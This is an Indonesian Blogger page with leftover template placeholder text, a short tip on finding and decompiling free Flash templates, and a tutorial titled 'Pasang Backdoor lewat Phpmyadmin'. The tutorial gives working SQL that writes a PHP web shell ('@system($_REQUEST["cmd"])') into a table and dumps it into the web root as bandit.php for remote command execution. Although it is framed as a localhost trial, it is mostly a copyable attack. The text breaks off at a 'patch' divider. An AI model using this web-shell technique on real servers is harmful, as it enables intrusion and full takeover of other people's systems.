http://aux.iconpedia.net/uploads/10875870971013046993.pnghttp://aux.iconpedia.net/uploads/1540998406962263282.png !

Featured Post 1 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 2 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 3 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 4 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 5 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 7 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 6 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More
Tampilkan postingan dengan label admin. Tampilkan semua postingan
Tampilkan postingan dengan label admin. Tampilkan semua postingan

Desember 14, 2011

Cara simple membuat website flash dgn template

langkah 1: mencari flash template gratis
pake mesin google, gunakan keyword :

Code:
allinurl:flash template ext:swf
nah keluar tuh jeroan2 flash template.silahkan dilihat, tapi klo mw langsung di save di kompi kita, cari yg ada tulisan awalnya [flash] pasti banyak tuh di setiap halaman....trus klik kanan pada linknya dan pilih "save link as"

cara lainnya yg lebih mudah adalah kita ke http://search.4shared.com/ kemudian ketik pada searchnya
Code:
flash template
pasti dapat.... yg keren-keren lagi tp dlm bentuk kompressi
swf yg kita dapat harus didecompiler dulu pake swf decompiler, (Continue)..

(Continue)..

Oktober 24, 2011

Pasang Backdoor lewat Phpmyadmin (windows)

Pasang Backdoor lewat Phpmyadmin (windows)
Phpmyadmin adalah perangkat lunak bebas (Open source) yang ditulis dalam bahasa pemrograman php untuk menangani administrasi Mysql.
Disini saya akan mencoba menerangkan tentang Backdoor via phpmyadmin pada webserver windows secara rinci!!
Yang pasti percobaan lewat localhost di windows…saya menggunakan XAMPP dan phpmyadmin 2.11.4!! 
Buka phpmyadminnya dengan URL
http://localhost/phpmyadmin
Setelah terbuka tampilan phpmyadmin, dan klik pada tab SQL / seperti pada telunjuk icon di bawah (query Window) 

Kemudian akan muncul  tampilan query window pada phpmyadmin tersebut.
Masukan perintah 
SHOW VARIABLES
“SHOW VARIABLES = Untuk mengetahui Base Dir / Direktori pada webserver tersebut”
Nanti pada Variable_name ada basedir (Letak Direktori Servernya)

Keterangan Gambar: 
Webserver tersebut terdapat pada Direktori E: ,dan pada Folder server 
Untuk lebih jelas mengetahui versi mySQL dan OS nya Lihat paling bawah

Mulai  dech…
Create Database: 
belajar
Kemudian pada Database : belajar , ada tab SQL seperti gambar di bawah ini




Dan masukan perintah di bawah pada text area!!  

CREATE TABLE iseng(
dor TEXT) TYPE=MYISaM;
INSERT INTO iseng(dor)
VALUES(
'<pre><body bgcolor=silver ><? @system($_REQUEST["cmd"]); ?></body></pre>');

Keterangan perintah di atas:  
Membuat table “iseng”  dan membuat field “dor” dengan type “text” sedangkan MyISAM adalah tipe tabel default dalam MySQL dan isi text tesebut adalah “ <? @system($_REQUEST["cmd"]); ?>“  itu adalah perintah untuk request ke system menggunakan bahasa PHP

Setelah itu klik pada tab SQL lagi, masukan perintah ini

select * into dumpfile 'E:/server/htdocs/bandit.php' from iseng;

keterangan perintah di atas adalah : 
kita coba dump sebuah file ke Direktori E: pada folder server dan htdocs adalah direktori yang akan ditampilkan oleh web server (Localhost) 

Selesai, Ketik URL :
http://localhost/bandit.php?cmd=cmd

Selanjutnya terserah anda
Dengan menggunakan perintah-perintah CMD pada windows!!!

Note: perintah-perintah CMD yang anda masukan harus seperti ini “/bandit.php?cmd=perintah_CMD”

------------------------------------------------------------------patch------------------------------------------------------------------------

(Continue)..

(Continue)..